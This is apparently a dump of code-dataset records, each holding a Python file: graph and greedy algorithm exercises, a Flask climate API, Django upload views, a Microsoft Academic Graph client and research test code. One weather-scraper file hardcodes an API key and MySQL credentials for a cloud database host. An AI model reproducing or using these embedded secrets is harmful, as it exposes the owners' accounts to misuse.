\r\nprint(order)\r\norder.sort()\r\nprint(order)\r\ntimelash=[0]*13\r\n\r\nd[1]=[False,7]\r\nd[2]=[False,5]\r\nd[3]=[False,9]\r\nd[4]=[False,1,10]\r\nd[5]=[False,8]\r\nd[6]=[False,3,8]\r\nd[7]=[False,4,9]\r\nd[8]=[False,2]\r\nd[9]=[False,6] \r\nd[10]=[False,1,12] \r\nd[11]=[False,10]\r\nd[12]=[False,11]\r\nfor o in order:\r\n timelash=[0]*13\r\n if d[o[1]][0]==False:\r\n DFS(d,o[1])\r\n q=len(timelash)-timelash.count(0)\r\n print(q)\r\n","sub_path":"Kosaraju-s Algorithm - Strongly Connected Components - Using Directional DFS/untitled3.py","file_name":"untitled3.py","file_ext":"py","file_size_in_byte":1356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"430269397","text":"from sqlalchemy import create_engine\nfrom six.moves.urllib.request import urlopen\nimport json\nimport pandas as pd\nfrom pandas.io.json import json_normalize\nimport time\n\ndef get_data():\n \"\"\"Get weather data from openweathermap\"\"\"\n #send a query to the API and decode the bytes it returns\n query = urlopen(\"http://api.openweathermap.org/data/2.5/forecast?id=7778677&units=metric&APPID=6986e64d5d176d1782825a12f2677fe4\").read().decode('utf-8')\n #return the obtained string as a dictionary\n data = json.loads(query)\n df = pd.DataFrame.from_dict(json_normalize(data['list'][0]['weather']), orient='columns')\n for i in range(1,39):\n df1 = pd.DataFrame.from_dict(json_normalize(data['list'][i]['weather']), orient='columns')\n df = df.append(df1, ignore_index=True)\n #df = pd.DataFrame(data['list']['dt_txt'])\n df2 = pd.DataFrame.from_dict(json_normalize(data['list']), orient='columns')\n dataframe = pd.concat([df, df2], axis=1)\n return dataframe[['dt_txt','main']]\n\ndef save_data_to_db(dataframe):\n #Assigning the engine variable values\n engine = create_engine(\"mysql+pymysql://Group8:COMP30670@dublinbikes-rse.c3hjycqhuxxq.eu-west-1.rds.amazonaws.com:3306/DublinBikes\")\n #Creating the connection with the database\n conn = engine.connect()\n #passing into scrapper functions\n #Replaces the real time info in the RealTime table in the Amazon RDS database every 2 mins\n dataframe.to_sql(name='WeatherPredictor',con=conn, if_exists='replace', index=False)\n conn.close()\n\n\nwhile True:\n data = get_data()\n save_data_to_db(data)\n time.sleep(24*60*60)","sub_path":"predictiveWeatherScraper.py","file_name":"predictiveWeatherScraper.py","file_ext":"py","file_size_in_byte":1617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"303553716","text":"# pick the non-overlapping classes from among those that finish earliest\n# sort by earliest finishing time\nn=int(input())\ntime=[list(map(int, input().split())) for _ in range(n)]\ntime.sort(key=lambda x:(x[1], x[0]))\nendtime=time[0][1]\ncount=1\nfor i in range(1, n):\n if time[i][0]>=endtime:\n endtime=time[i][1]\n count+=1\nprint(count)","sub_path":"Greedy/회의실배정.py","file_name":"회의실배정.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"77490644","text":"jedi = {\n \"palacinke\": {\"jajce\": 1, \"mleko\": 0.3, \"moka\": 0.2},\n \"smorn\": {\"jajce\": 1, \"mleko\": 0.3, \"moka\": 0.2},\n \"krompirjev golaz\": {\"krompir\": 2, \"paprika\": 1, \"cebula\": 1},\n \"sataras\": {\"paradiznik\": 1, \"paprika\": 1, \"jajce\": 1, \"cebula\": 1, \"kruh\": 0.2},\n \"hrenovke\": {\"hrenovka\": 1, \"kruh\": 0.2},\n \"makaroni\": {\"makaroni\": 0.2, \"paradiznik\": 0.5, \"meso\": 0.2, \"cebula\": 0.3},\n \"marmelada\": 
{\"marmelada\": 0.1, \"kruh\": 0.3},\n \"piškot\": {\"piškot\": 2}\n}\n\n\ndef ena_jed(jed, jedcev):\n sestavine = {}\n for sestavina, kolicina in jedi[jed].items():\n sestavine[sestavina] = kolicina * jedcev\n return sestavine\n\n\ndef ena_jed_boljse(jed, jedcev):\n return {sestavina: kolicina * jedcev for sestavina, kolicina in jedi[jed].items()}\n\n\nprint(ena_jed('palacinke', 4))\nprint(ena_jed_boljse('palacinke', 4))\n\nimport collections\n\nobroki = [(\"makaroni\", 20), (\"krompirjev golaz\", 25), (\"hrenovke\", 18),\n (\"sataras\", 18)]\n\n\ndef nakup(obroki):\n sestavine = collections.defaultdict(float)\n for jed, jedcev in obroki:\n for sestavina, kolicina in ena_jed_boljse(jed, jedcev).items():\n sestavine[sestavina] += kolicina\n return sestavine\n\n\nprint(nakup(obroki))\n\nzaloga = {\"jajca\": 10, \"mleko\": 2, \"moka\": 2, \"marmelada\": 2, \"kruh\": 1}\n\n\ndef obrokov(jed, zaloga):\n koliko = None\n for sestavina, kolicina in jedi[jed].items():\n imamo = zaloga.get(sestavina, 0) // kolicina\n if koliko is None or imamo < koliko:\n koliko = imamo\n return koliko\n\n\nprint(obrokov('palacinke', zaloga))\n","sub_path":"05_slovarji, izpeljani seznami/07_jedilniki.py","file_name":"07_jedilniki.py","file_ext":"py","file_size_in_byte":1575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"544449177","text":"\"\"\"\nemailverifier.models.Response\n~~~~~~~~~~~~~~~~~~~~~~~\nResponse model which represents service response like an object\n\"\"\"\n\nfrom json import loads\nfrom .audit import Audit\n\n\nclass Response:\n json_string = ''\n\n def __init__(self, json):\n \"\"\"\n Initialise the Response object\n\n :param str json: The json string with service response\n \"\"\"\n self.json_string = json\n\n parsed = loads(json)\n\n self.email_address = parsed['emailAddress'] \\\n if 'emailAddress' in parsed else None\n self.format_check = Response.__convert_to_bool(parsed['formatCheck']) \\\n if 'formatCheck' in parsed else None\n self.smtp_check = Response.__convert_to_bool(parsed['smtpCheck']) \\\n if 'smtpCheck' in parsed else None\n self.dns_check = Response.__convert_to_bool(parsed['dnsCheck']) \\\n if 'dnsCheck' in parsed else None\n self.free_check = Response.__convert_to_bool(parsed['freeCheck']) \\\n if 'freeCheck' in parsed else None\n self.disposable_check = Response.__convert_to_bool(parsed['disposableCheck']) \\\n if 'disposableCheck' in parsed else None\n self.catch_all_check = Response.__convert_to_bool(parsed['catchAllCheck']) \\\n if 'catchAllCheck' in parsed else None\n self.mx_records = parsed['mxRecords'] if 'mxRecords' in parsed else None\n self.audit = Audit(parsed['audit']) if 'audit' in parsed else None\n\n @staticmethod\n def __convert_to_bool(value):\n _val = str(value).lower()\n\n if _val == 'true':\n return True\n if _val == '1':\n return True\n if _val == 'null':\n return None\n\n return False\n\n def __str__(self):\n return self.json_string\n","sub_path":"venv/Lib/site-packages/emailverifier/models/response.py","file_name":"response.py","file_ext":"py","file_size_in_byte":1783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"409289564","text":"import pathlib\n\nimport ray\nimport shutil\nimport sys\nimport unittest\n\nimport os\nimport tempfile\nfrom axolotl.backend.ray import RayRunner\n\nfrom axolotl.algorithms.bayesian_search import BayesianSearch\nfrom axolotl.backend.simple import SimpleRunner\n\nPROJECT_ROOT = 
os.path.join(os.path.dirname(__file__), '..')\nsys.path.insert(0, PROJECT_ROOT)\n\nfrom d3m.metadata import problem as problem_module\nfrom d3m import container as container_module\nfrom axolotl.utils import pipeline as pipeline_utils\n\n\nclass TestBayesianSearch(unittest.TestCase):\n def setUp(self):\n self.test_data = os.path.join(PROJECT_ROOT, 'tests', 'data')\n dataset_name = 'iris_dataset_1'\n problem = self.__get_problem(dataset_name)\n self.problem = problem\n self.dataset = self.__get_dataset(dataset_name)\n self.test_dir = tempfile.mkdtemp()\n backend = SimpleRunner(random_seed=42, volumes_dir=None, scratch_dir=self.test_dir)\n self.tuner_base = BayesianSearch(problem, backend=backend, max_trials=10, directory=self.test_dir,\n num_initial_points=5)\n\n def tearDown(self):\n shutil.rmtree(self.test_dir)\n\n def test_fit(self):\n _, pipeline_result = self.tuner_base.search_fit(input_data=[self.dataset], time_limit=60)\n self.assertEqual(pipeline_result.error, None)\n\n def test_fit_svc(self):\n pipeline_info = os.path.join(os.path.dirname(__file__), 'resources', 'svc_pipeline.json')\n pipeline = pipeline_utils.load_pipeline(pipeline_info)\n _, pipeline_result = self.tuner_base.search_fit(input_data=[self.dataset], time_limit=60,\n pipeline_candidates=[pipeline])\n self.assertEqual(pipeline_result.error, None)\n\n def test_fit_lr(self):\n pipeline_info = os.path.join(os.path.dirname(__file__), 'resources', 'logistic_regeression.json')\n pipeline = pipeline_utils.load_pipeline(pipeline_info)\n _, pipeline_result = self.tuner_base.search_fit(input_data=[self.dataset], time_limit=60,\n pipeline_candidates=[pipeline])\n self.assertEqual(pipeline_result.error, None)\n\n def test_fit_ray(self):\n if not ray.is_initialized():\n ray.init()\n backend = RayRunner(random_seed=42, volumes_dir=None, scratch_dir=self.test_dir)\n tuner_base = BayesianSearch(self.problem, backend=backend, max_trials=30, directory=self.test_dir,\n num_initial_points=5)\n _, pipeline_result = tuner_base.search_fit(input_data=[self.dataset], time_limit=100)\n self.assertEqual(pipeline_result.error, None)\n ray.shutdown()\n\n def __get_uri(self, path):\n return pathlib.Path(os.path.abspath(path)).as_uri()\n\n def __get_problem(self, dataset_name):\n problem_path = os.path.join(\n self.test_data, 'problems', dataset_name.replace('dataset', 'problem'), 'problemDoc.json')\n problem_uri = self.__get_uri(problem_path)\n problem = problem_module.Problem.load(problem_uri)\n return problem\n\n def __get_dataset(self, dataset_name):\n dataset_path = os.path.join(\n self.test_data, 'datasets', dataset_name, 'datasetDoc.json')\n dataset_uri = self.__get_uri(dataset_path)\n dataset = container_module.dataset.get_dataset(dataset_uri)\n return dataset\n\n\nif __name__ == '__main__':\n suite = unittest.TestSuite()\n for test_case in (\n 'test_fit',\n 'test_fit_ray',\n 'test_fit_lr',\n 'test_fit_svc',\n ):\n suite.addTest(TestBayesianSearch(test_case))\n unittest.TextTestRunner(verbosity=2).run(suite)\n","sub_path":"tests/test_bayesian.py","file_name":"test_bayesian.py","file_ext":"py","file_size_in_byte":3729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"405258186","text":"import enum\nfrom typing import List\nclass Solution:\n def platesBetweenCandles(self, s: str, queries: List[List[int]]) -> List[int]:\n \"\"\"\n The old prefix handling below was clumsy; use arrays of length len(s) instead\n ans = []\n isolation = []\n sum = 0\n for i,ch in enumerate(s):\n if ch=='|':\n sum+=1\n isolation.append((i,sum))\n if len(isolation)==0:\n for i in range(len(queries)):\n ans.append(0)\n return ans\n\n for (left,right) in queries:\n left_sum,right_sum=0,0\n for (pos,num) in isolation:\n if pos>=left:\n left = pos\n left_sum = num\n break\n for i in range(len(isolation)-1,-1,-1):\n if isolation[i][0]<=right:\n right = isolation[i][0]\n right_sum = isolation[i][1]\n break\n if left>=right:\n ans.append(0)\n else:\n ans.append((right-left-1)-(right_sum-left_sum-1)) \n return ans\n \"\"\"\n n = len(s)\n sumlist,sum= [0]*n,0 # prefix count of '*' at each position\n left,l = [0]*n,-1 # nearest '|' to the left\n for i,ch in enumerate(s):\n if ch=='*':\n sum+=1\n else:\n l = i\n\n sumlist[i] = sum\n left[i] = l\n\n right,r = [0]*n,-1 # nearest '|' to the right\n for i in range(n-1,-1,-1):\n if s[i]=='|':\n r = i\n right[i] = r\n\n ans = [0]*len(queries)\n for i,(x,y) in enumerate(queries):\n x = right[x] # snap the left endpoint to the nearest '|' on its right\n y = left[y]\n if x>=0 and y>=0 and x\", \"/api/v1.0/<start>/<end>\"]\n return jsonify(out)\n\n@app.route(\"/api/v1.0/precipitation\")\ndef precipitation():\n out = {}\n for row in measurements:\n out[row[1]] = row[2]\n return jsonify(out)\n\n@app.route(\"/api/v1.0/stations\")\ndef stations():\n out = []\n for row in stations_data:\n out.append(row[0])\n return jsonify(out)\n\n@app.route(\"/api/v1.0/tobs\")\ndef tobs():\n start_date = \"2016-08-23\"\n out = []\n for rows in measurements:\n if datetime.date.fromisoformat(start_date) <= datetime.date.fromisoformat(rows[1]):\n out.append(rows[3])\n return jsonify(out)\n\n@app.route(\"/api/v1.0/<start>\")\ndef temp_stat_start(start):\n out = []\n for rows in measurements:\n if datetime.date.fromisoformat(start) <= datetime.date.fromisoformat(rows[1]):\n out.append(rows[3])\n return jsonify([min(out), sum(out)/len(out), max(out)])\n\n@app.route(\"/api/v1.0/<start>/<end>\")\ndef temp_stat_startend(start, end):\n out = []\n for rows in measurements:\n if datetime.date.fromisoformat(start) <= datetime.date.fromisoformat(rows[1]) and datetime.date.fromisoformat(end) >= datetime.date.fromisoformat(rows[1]):\n out.append(rows[3])\n return jsonify([min(out), sum(out)/len(out), max(out)])\n\nif __name__ == \"__main__\":\n app.run(debug=True)","sub_path":"Flask_sqlalchemy_rest.py","file_name":"Flask_sqlalchemy_rest.py","file_ext":"py","file_size_in_byte":3163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"164177285","text":"from alphabet_detector import AlphabetDetector\nfrom collections import defaultdict\nimport logging\nimport pandas as pd\nimport requests\nfrom retrying import retry\n\nfrom nesta.core.luigihacks import misctools\nfrom nesta.core.orms.orm_utils import get_mysql_engine\nfrom nesta.core.orms.mag_orm import FieldOfStudy\n\n\nENDPOINT = \"https://api.labs.cognitive.microsoft.com/academic/v1.0/evaluate\"\n\n\ndef prepare_title(title):\n \"\"\"Replaces non-alphanums from a paper title, allowing foreign characters and cleans\n up multiple spaces and trailing spaces.\n\n Args:\n title (str): the title of the paper\n\n Returns:\n (str): cleaned title\n \"\"\"\n detector = AlphabetDetector()\n if title is None:\n return \"\"\n result = \"\".join([x if len(detector.detect_alphabet(x)) > 0 or x.isnumeric()\n else \" \" for x in title.lower()])\n # Recursively remove spaces\n while \"  \" in result:\n result = result.replace(\"  \", \" \")\n # Remove trailing spaces\n if result[-1] == \" \":\n result = result[0:-1]\n return result\n\n\ndef build_expr(query_items, entity_name, max_length=16000):\n \"\"\"Builds and yields OR expressions for MAG from a list of items. 
Strings and\n integer items are formatted quoted and unquoted respectively, as per the MAG query\n specification.\n\n The maximum accepted query length for the api appears to be around 16,000 characters.\n\n Args:\n query_items (list): all items to be queried\n entity_name (str): the mag entity to be queried ie 'Ti' or 'Id'\n max_length (int): length of the expression which should not be exceeded. Yields\n occur at or below this expression length\n\n Returns:\n (str): expression in the format expr=OR(entity_name=item1, entity_name=item2...)\n \"\"\"\n expr = []\n length = 0\n query_prefix_format = \"expr=OR({})\"\n for item in query_items:\n if type(item) == str:\n formatted_item = f\"{entity_name}='{item}'\"\n elif type(item) == int:\n formatted_item = f\"{entity_name}={item}\"\n length = sum(len(e) + 1 for e in expr) + len(formatted_item) + len(query_prefix_format)\n if length >= max_length:\n yield query_prefix_format.format(','.join(expr))\n expr.clear()\n expr.append(formatted_item)\n\n # pick up any remainder below max_length\n if len(expr) > 0:\n yield query_prefix_format.format(','.join(expr))\n\n\n@retry(stop_max_attempt_number=10)\ndef query_mag_api(expr, fields, subscription_key, query_count=1000, offset=0):\n \"\"\"Posts a query to the Microsoft Academic Graph Evaluate API.\n\n Args:\n expr (str): expression as built by build_expr\n fields: (:obj:`list` of `str`): codes of fields to return, as per mag documentation\n query_count: (int): number of items to return\n offset (int): offset in the results if paging through them\n\n Returns:\n (dict): json response from the api containing 'expr' (the original expression)\n and 'entities' (the results) keys.\n If there are no results 'entities' is an empty list.\n \"\"\"\n headers = {\n 'Ocp-Apim-Subscription-Key': subscription_key,\n 'Content-Type': 'application/x-www-form-urlencoded'\n }\n query = f\"{expr}&count={query_count}&offset={offset}&attributes={','.join(fields)}\"\n\n r = requests.post(ENDPOINT, data=query.encode(\"utf-8\"), headers=headers)\n r.raise_for_status()\n\n return r.json()\n\n\ndef query_fields_of_study(subscription_key,\n ids=None,\n levels=None,\n fields=['Id', 'DFN', 'FL', 'FP.FId', 'FC.FId'],\n # id, display_name, level, parent_ids, children_ids\n query_count=1000,\n results_limit=None):\n \"\"\"Queries the MAG for fields of study. Expect >650k results for all levels.\n\n Args:\n subscription_key (str): MAG api subscription key\n ids: (:obj:`list` of `int`): field of study ids to query\n levels (:obj:`list` of `int`): levels to extract. 
0 is highest, 5 is lowest\n fields (:obj:`list` of `str`): codes of fields to return, as per mag documentation\n query_count (int): number of items to return from each query\n results_limit (int): break and return as close to this number of results as the\n offset and query_count allow (for testing)\n\n Returns:\n (:obj:`list` of `dict`): processed results from the api query\n \"\"\"\n if ids is not None and levels is None:\n expr_args = (ids, 'Id')\n elif levels is not None and ids is None:\n expr_args = (levels, 'FL')\n else:\n raise TypeError(\"Field of study ids OR levels should be supplied\")\n\n field_mapping = {'Id': 'id',\n 'DFN': 'name',\n 'FL': 'level',\n 'FP': 'parent_ids',\n 'FC': 'child_ids'}\n fields_to_drop = ['logprob', 'prob']\n fields_to_compact = ['parent_ids', 'child_ids']\n\n for expr in build_expr(*expr_args):\n logging.info(expr)\n count = 1000\n offset = 0\n while True:\n fos_data = query_mag_api(expr, fields, subscription_key=subscription_key,\n query_count=count, offset=offset)\n if fos_data['entities'] == []:\n logging.info(\"Empty entities returned, no more data\")\n break\n\n # clean up and formatting\n for row in fos_data['entities']:\n for f in fields_to_drop:\n del row[f]\n\n for code, description in field_mapping.items():\n try:\n row[description] = row.pop(code)\n except KeyError:\n pass\n\n for field in fields_to_compact:\n try:\n row[field] = ','.join(str(ids['FId']) for ids in row[field])\n except KeyError:\n # no parents and/or children\n pass\n\n logging.info(f'new fos: {row}')\n yield row\n\n offset += len(fos_data['entities'])\n logging.info(offset)\n\n if results_limit is not None and offset >= results_limit:\n break\n\n\ndef dedupe_entities(entities):\n \"\"\"Finds the highest probability match for each title in returned entities from MAG.\n Args:\n entities (:obj:`list` of `dict`): entities from the MAG api\n\n Returns:\n (set): ids of entities with the highest probability score, one for each title\n \"\"\"\n titles = defaultdict(dict)\n for row in entities:\n titles[row['Ti']].update({row['Id']: row['logprob']})\n\n deduped_mag_ids = set()\n for title in titles.values():\n # find highest probability match for each title\n deduped_mag_ids.add(sorted(title, key=title.get, reverse=True)[0])\n\n return deduped_mag_ids\n\n\ndef update_field_of_study_ids(mag_subscription_key, session, fos_ids):\n logging.info(f\"Missing field of study ids: {fos_ids}\")\n logging.info(f\"Querying MAG for {len(fos_ids)} missing fields of study\")\n new_fos_to_import = [FieldOfStudy(**fos) for fos\n in query_fields_of_study(mag_subscription_key, ids=fos_ids)]\n logging.info(f\"Retrieved {len(new_fos_to_import)} new fields of study from MAG\")\n fos_not_found = fos_ids - {fos.id for fos in new_fos_to_import}\n if fos_not_found:\n raise ValueError(f\"Fields of study present in articles but could not be found in MAG Fields of Study database. 
New links cannot be created until this is resolved: {fos_not_found}\")\n\n session.add_all(new_fos_to_import)\n session.commit()\n logging.info(\"Added new fields of study to database\")\n\n\nif __name__ == \"__main__\":\n log_stream_handler = logging.StreamHandler()\n logging.basicConfig(handlers=[log_stream_handler, ],\n level=logging.INFO,\n format=\"%(asctime)s:%(levelname)s:%(message)s\")\n\n # collect api key from config\n mag_config = misctools.get_config('mag.config', 'mag')\n subscription_key = mag_config['subscription_key']\n\n # setup database connectors\n engine = get_mysql_engine(\"MYSQLDB\", \"mysqldb\", \"dev\")\n\n # *** query papers from arxiv titles\n df = pd.read_csv(\"/Users/russellwinch/Documents/data/arxiv_2017.csv\", nrows=1000)\n\n author_mapping = {'AuN': 'author_name',\n 'AuId': 'author_id',\n 'AfN': 'author_affiliation',\n 'AfId': 'author_affiliation_id',\n 'S': 'author_order'}\n\n field_mapping = {\"Id\": 'id',\n \"Ti\": 'title', # not needed\n \"F\": 'fields_of_study',\n \"AA\": 'authors',\n \"CC\": 'citation_count'}\n # query papers\n paper_fields = [\"Id\", \"Ti\", \"F.FId\", \"CC\", \"AA.AuN\", \"AA.AuId\",\n \"AA.AfN\", \"AA.AfId\", \"AA.S\"]\n for expr in build_expr(list(df.title.apply(prepare_title)), 'Ti', max_length=16000): # this .apply will take forever on the whole dataset. move to a generator\n # print(expr)\n data = query_mag_api(expr, paper_fields, subscription_key)\n # print(json.dumps(data['entities'][0], indent=4))\n print(f\"query length: {len(expr)}\")\n print(f\"titles in query: {len(expr.split(','))}\")\n print(f\"entities returned from api: {len(data['entities'])}\")\n\n break\n\n # *** extract field ids from papers\n # fids = set()\n # for entity in data['entities']:\n # for f in entity['F']:\n # fids.add(f['FId'])\n # print(fids)\n\n # query field ids\n # fos_fields = ['Id', 'DFN', 'FL', 'FP.FN']\n # for expr in build_expr(fids, 'Id'):\n # # print(expr)\n # fos_data = query_mag_api(expr, fos_fields)\n # print(fos_data)\n # break\n\n # *** extract list of ids\n # fos_level_fields = ['Id', 'DFN', 'FL', 'FP.FId', 'FC.FId'] # id, display_name, level, parent_ids, children_ids\n # for expr in build_expr([2909385909, 2911099694], 'Id'):\n # print(expr)\n # count = 1000\n # data = query_mag_api(expr, fos_level_fields, query_count=count)\n # print(data)\n","sub_path":"nesta/packages/mag/query_mag_api.py","file_name":"query_mag_api.py","file_ext":"py","file_size_in_byte":10340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"130665643","text":"from django.shortcuts import render\nfrom upload.models import Folder,File,Time\nfrom upload.forms import FolderForm,SearchForm,FileFormAPI,TimeForm\nfrom django.http import JsonResponse\nfrom django.views.decorators.csrf import csrf_exempt\nimport time\n\n# Create your views here.\n\n\ndef abc(request):\n\tprint(request.user)\n\tFolder.objects.create(name = 'abc')\n\treturn JsonResponse({'a' : 1},safe=False)\n\ndef rootfinder(request):\n\n\troot = Folder.objects.filter(parentfolder__isnull = True,author = request.user)\n\tif len(root) > 0:\n\t\troot = root[0]\n\telse:\n\t\troot = Folder.objects.create(name = request.user.username, author = request.user)\n\t\troot.save()\n\treturn JsonResponse({'root' : root.pk},safe=False)\n\n@csrf_exempt\ndef createfolder(request,parent_id):\n\tparent = Folder.objects.get(pk = parent_id)\n\n\tform = FolderForm(request.POST, request.FILES)\n\tif form.is_valid():\n\t\ttemp = form.save(commit = False)\n\t\ttemp.author = 
request.user\n\t\ttemp.parentfolder = parent\n\t\t# temp.save()\n\t\t# key = temp.pk\n\t\tlst = Folder.objects.filter(name = temp.name, parentfolder = parent, author = request.user)\n\t\tif len(lst) != 0:\n\t\t\tkey = lst[0].pk\n\t\t\treturn JsonResponse({'key':key,'status' : \"no\"},safe = False)\n\t\telse:\n\t\t\ttemp.save()\n\t\t\tkey = temp.pk\n\t\t\treturn JsonResponse({'key':key,'status' : \"yes\"},safe = False)\n\t\t# return JsonResponse({'key':key},safe = False)\n\telse:\n\t\treturn JsonResponse({\"error\"},safe = False)\n\n@csrf_exempt\ndef uploadfile(request,parent_id):\n\tparent = Folder.objects.get(pk = parent_id)\n\n\tform = FileFormAPI(request.POST, request.FILES)\n\tif form.is_valid():\n\t temp = form.save(commit = False)\n\t temp.author = request.user\n\t # temp.name = str(temp.file)\n\t temp.parentfolder = parent\n\t # temp.save()\n\t key = temp.pk\n\t print(\"goes here\")\n\t lst = File.objects.filter(name = temp.name, parentfolder = parent, author = request.user)\n\t print(lst)\n\t if len(lst) != 0:\n\t \tkey = lst[0].pk\n\t \tlst[0].delete()\n\t \ttemp.save()\n\t \treturn JsonResponse({'key':key,'status' : \"no\"},safe = False)\n\t else:\n\t \ttemp.save()\n\t \tkey = temp.pk\n\t \treturn JsonResponse({'key':key,'status' : \"yes\"},safe = False)\n\t # return JsonResponse({'key':key},safe = False)\n\telse:\n\t\tprint(\"no here\")\n\t\treturn JsonResponse({'error' : \"error\" },safe = False)\n\n\n@csrf_exempt\ndef filedownload(request,parent_id):\n\tparent = Folder.objects.get(pk = parent_id)\n\tfiles = File.objects.filter(parentfolder = parent,author = request.user)\n\n\tinfolist = []\n\n\tfor file in files:\n\t\tdicti = {}\n\t\tdicti['name'] = file.name\n\t\tdicti['file'] = str(file.file)\n\t\tdicti['md5sum'] = file.md5sum\n\t\tinfolist.append(dicti)\n\n\treturn JsonResponse({'info' : infolist},safe = False)\n\n@csrf_exempt\ndef folderlist(request,parent_id):\n\tparent = Folder.objects.get(pk = parent_id)\n\tfolders = Folder.objects.filter(parentfolder = parent,author = request.user)\n\n\tinfolist = []\n\n\tfor folder in folders:\n\t\tdicti = {}\n\t\tdicti['name'] = folder.name\n\t\tdicti['id'] = folder.pk\n\t\tinfolist.append(dicti)\n\ttry:\n\t\tparent_id = parent.parentfolder.pk\n\texcept:\n\t\ttemp = Folder.objects.filter(parentfolder__isnull = True, author = request.user)\n\t\tparent_id = temp[0].pk\n\n\treturn JsonResponse({'folderlist' : infolist,'parent' : parent_id},safe = False)\n\n@csrf_exempt\ndef get_time_info(request):\n\ttimes = Time.objects.filter(author = request.user)\n\tif len(times) < 1:\n\t\tprint(time.time())\n\t\ta = Time.objects.create(author = request.user, timestamp = time.time(), sync_allowed = \"1\")\n\t\ta.save()\n\t\treturn JsonResponse({'allowed' : a.sync_allowed, 'time' : a.timestamp}, safe = False)\n\telse:\n\t\treturn JsonResponse({'allowed' : times[0].sync_allowed, 'time' : times[0].timestamp} ,safe = False)\n\n@csrf_exempt\ndef update_time_info(request):\n\ttimes = Time.objects.filter(author = request.user)\n\ttimes[0].delete()\n\tform = TimeForm(request.POST)\n\tif form.is_valid():\n\t\ttemp = form.save(commit = False)\n\t\ttemp.author = request.user\n\t\ttemp.save()\n\t\treturn JsonResponse({'success' : \"success\"}, safe = False)\n\telse:\n\t\treturn JsonResponse({'error' : \"error\"},safe = False)\n\n\n\t\n\n\n\n","sub_path":"server/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} 
+{"seq_id":"291747399","text":"'''\nCreated on May 5, 2013\n\n@author: zhouyang\n'''\nimport pprint\n\n\n\n\ndef construct_frame():\n    phi_f = open('./parameters/phi.txt', 'r')\n    psi_f = open('./parameters/psi.txt', 'r')\n    omega_f = open('./parameters/omega.txt', 'r')\n    doc_f = open('./exper/documents.txt', 'r')\n    \n    subject_data = phi_f.read()\n    predicate_data = omega_f.read()\n    object_data = psi_f.read()\n    \n    subjects = [ word.split('\\t') for word in subject_data.split('\\n')[:-1] ]\n    predicates = [ word.split('\\t') for word in predicate_data.split('\\n')[:-1] ]\n    objects = [ word.split('\\t') for word in object_data.split('\\n')[:-1] ]\n    \n    ## Sort subject, predicates, objects according to probability\n    for i in range(len(subjects)):\n        for j in range(len(subjects[0])):\n            s = subjects[i][j]\n            subjects[i][j] = s + ':' + str(j)\n    for i in range(len(predicates)):\n        for j in range(len(predicates[0])):\n            s = predicates[i][j]\n            predicates[i][j] = s + ':' + str(j)\n    for i in range(len(objects)):\n        for j in range(len(objects[0])):\n            s = objects[i][j]\n            objects[i][j] = s + ':' + str(j)\n    \n    for i in range(len(subjects)):\n        subjects[i].sort(reverse=True)\n    for i in range(len(predicates)):\n        predicates[i].sort(reverse=True)\n    for i in range(len(objects)):\n        objects[i].sort(reverse=True)\n    \n    ## Saving subjects, predicates, objects\n    subjects_f = open('./frames/subjects.txt', 'w')\n    predicates_f = open('./frames/predicates.txt', 'w')\n    objects_f = open('./frames/objects.txt', 'w')\n    \n    buf = ''\n    for i in range(len(subjects)):\n        for j in range(len(subjects[0])):\n            buf += subjects[i][j]\n            buf += '\\t'\n        buf += '\\n'\n    subjects_f.write(buf)\n    \n    buf = ''\n    for i in range(len(predicates)):\n        for j in range(len(predicates[0])):\n            buf += predicates[i][j]\n            buf += '\\t'\n        buf += '\\n'\n    predicates_f.write(buf)\n    \n    buf = ''\n    for i in range(len(objects)):\n        for j in range(len(objects[0])):\n            buf += objects[i][j]\n            buf += '\\t'\n        buf += '\\n'\n    objects_f.write(buf)\n    \n    doc_f.close()\n    subjects_f.close()\n    predicates_f.close()\n    objects_f.close()\n    phi_f.close()\n    psi_f.close()\n    omega_f.close()\n    \n    \n    ## Saving frames\n    num_frame = len(subjects)\n    # frame = [[0]] * num_frame\n    V = len(subjects[0])\n    for i in range(num_frame):\n        buf = ''\n        for v in range(V):\n            buf += subjects[i][v]\n            buf += '\\t'\n            buf += predicates[i][v]\n            buf += '\\t'\n            buf += objects[i][v]\n            buf += '\\t'\n        buf += '\\n'\n        f_f = open('./frames/frame' + str(i) + '.txt', 'w')\n        f_f.write(buf)\n        f_f.close()\n\n    ## Saving indx frames only\n    frames = [ [[], [], []] for _ in range(num_frame) ] # one independent [sbj, prd, obj] triple per frame; multiplying a nested list would alias the same inner lists across all frames\n    for i in range(num_frame):\n        buf = ''\n        for v in range(V):\n            indx = subjects[i][v].split(':')[1]\n            buf += indx\n            frames[i][0].append(indx)\n            buf += '\\t'\n            indx = predicates[i][v].split(':')[1]\n            buf += indx\n            frames[i][1].append(indx)\n            buf += '\\t'\n            indx = objects[i][v].split(':')[1]\n            buf += indx\n            frames[i][2].append(indx)\n            buf += '\\t'\n        buf += '\\n'\n        f_f = open('./frames/frame_index' + str(i) + '.txt', 'w')\n        f_f.write(buf)\n        f_f.close()\n    \n\n\ndef construct_strict_frame():\n    \"\"\"\n    frames = [ frame ]*\n    frame = [sbj, prd, obj]\n    sub = {word: value}* \n    prd = {word: value}*\n    obj = {word: value}*\n    \"\"\"\n    doc_f = open('./tmp/documents.txt', 'r')\n    frame_f = open('./tmp/frame.txt', 'r')\n    phi_f = open('./tmp/phi.txt', 'r')\n    psi_f = open('./tmp/psi.txt', 'r')\n    omega_f = open('./tmp/omega.txt', 'r')\n    theta_f = open('./tmp/theta.txt', 'r')\n    \n    frame_data = frame_f.read()\n    document_data = doc_f.read() \n    subject_data = phi_f.read()\n    predicate_data = 
